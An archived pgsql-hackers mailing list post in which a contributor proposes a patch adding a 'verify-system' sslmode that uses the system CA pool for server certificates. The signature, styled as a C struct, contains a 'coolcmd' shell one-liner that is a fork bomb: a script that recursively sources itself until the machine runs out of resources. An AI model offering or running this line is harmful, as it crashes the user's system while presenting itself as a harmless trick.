Home > mailing lists

[PATCH] Add `verify-system` sslmode to use system CA pool for server cert - Mailing list pgsql-hackers

From	Thomas Habets
Subject	[PATCH] Add `verify-system` sslmode to use system CA pool for server cert
Date	September 6, 2021 18:42:07
Msg-id	CA+kHd+cJwCUxVb-Gj_0ptr3_KZPwi3+67vK6HnLFBK9MzuYrLA@mail.gmail.com Whole thread Raw
Responses	Re: [PATCH] Add `verify-system` sslmode to use system CA pool for server cert (Tom Lane <tgl@sss.pgh.pa.us>)
List	pgsql-hackers

Tree view

With Letsencrypt now protecting web servers left and right, and it makes sense to me to just re-use the cert that the server may already have installed.

I've tested this on debian with the client compiled from the master branch, against a 13.3 server.

This is my first patch to postgresql, so I apologize for any process errors. I tried to follow https://wiki.postgresql.org/wiki/Submitting_a_Patch

Hope this list takes attachments.

typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "thomas@habets.se" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" };
char pgp[] = { "9907 8698 8A24 F52F 1C2E 87F6 39A4 9EEA 460A 0169" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;

Attachment

0001-Add-sslmode-verify-system-using-default-CAs.patch

pgsql-hackers by date:

From: "Drouvot, Bertrand"
Date: 06 September 2021, 18:24:23
Subject: Re: [BUG] Failed Assertion in ReorderBufferChangeMemoryUpdate()

From: Dilip Kumar
Date: 06 September 2021, 18:43:50
Subject: Re: [BUG] Failed Assertion in ReorderBufferChangeMemoryUpdate()

[PATCH] Add `verify-system` sslmode to use system CA pool for server cert - Mailing list pgsql-hackers

Attachment

Previous

Next